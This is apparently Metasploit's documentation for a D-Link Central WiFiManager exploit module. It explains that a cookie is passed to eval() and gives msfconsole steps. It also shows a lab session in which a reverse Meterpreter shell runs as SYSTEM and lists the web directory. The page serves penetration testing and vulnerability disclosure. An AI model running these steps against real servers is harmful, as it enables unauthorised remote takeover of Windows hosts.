adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
T
Niboucha Redouane aec83d54cd fix case of first character of sentence 
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-08-17 21:06:18 +02:00

3.4 KiB
Raw Blame History

Vulnerable Application

Introduction

This module exploits a PHP code injection vulnerability in D-Link Central WiFiManager CWM100. The vulnerability exists because a user-controlled cookie is passed to the eval() function without being sanitized.

Because the HTTP server runs in the context of a privileged user (with a default installation), successful exploitation results in code execution as nt_authority\system.

A vulnerable version is available at DLink's vulnerability announcement:

Verification Steps

  1. Start msfconsole
  2. Do: use windows/http/dlink_central_wifimanager_rce
  3. Do: set RHOSTS [RHOSTS]
  4. Check the payload options: show options
  5. Do: exploit
  6. Verify that you get a shell / meterpreter / that whatever payload you used was executed

Options

No additional options

Scenarios

CWM-100 v1.03

Getting a meterpreter session

msf5 exploit(windows/http/dlink_central_wifimanager_rce) > 
msf5 exploit(windows/http/dlink_central_wifimanager_rce) > exploit 

[*] Started reverse TCP handler on 192.168.1.222:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (38288 bytes) to 192.168.1.223
[*] Meterpreter session 1 opened (192.168.1.222:4444 -> 192.168.1.223:1783) at 2020-08-13 14:51:09 +0200

meterpreter > sysinfo
Computer    : REVM-PC
OS          : Windows NT REVM-PC 6.1 build 7601 (Windows 7 Professional N Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter > getuid 
Server username: SYSTEM (0)
meterpreter > pwd
C:\Program Files (x86)\D-Link\Central WifiManager\web
meterpreter > ls
Listing: C:\Program Files (x86)\D-Link\Central WifiManager\web
==============================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  177     fil   2014-09-16 16:19:18 +0200  .htaccess
100666/rw-rw-rw-  138884  fil   2016-01-28 13:36:32 +0100  AP_Installation_utility_for_cwm.zip
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:25 +0200  CapLoginStyle
40777/rwxrwxrwx   0       dir   2020-08-13 12:50:25 +0200  Common
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:45 +0200  Conf
40777/rwxrwxrwx   0       dir   2020-08-13 12:50:25 +0200  DBBackup
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:44 +0200  Lang
40777/rwxrwxrwx   0       dir   2020-08-13 12:50:26 +0200  Lib
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:45 +0200  Public
100666/rw-rw-rw-  256     fil   2014-09-16 16:19:18 +0200  README.txt
40777/rwxrwxrwx   0       dir   2020-08-13 13:02:13 +0200  Runtime
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:27 +0200  ThinkPHP
40777/rwxrwxrwx   0       dir   2020-08-13 12:50:26 +0200  Tpl
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:38 +0200  captivalportal
40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:36 +0200  ckeditor
100666/rw-rw-rw-  15086   fil   2014-09-16 16:19:18 +0200  favicon.ico
100666/rw-rw-rw-  158     fil   2014-09-16 16:19:18 +0200  index.php
100666/rw-rw-rw-  122     fil   2015-10-29 14:17:48 +0100  redrect.php
100666/rw-rw-rw-  211     fil   2014-09-16 16:19:18 +0200  robots.txt
Reference in New Issue View Git Blame Copy Permalink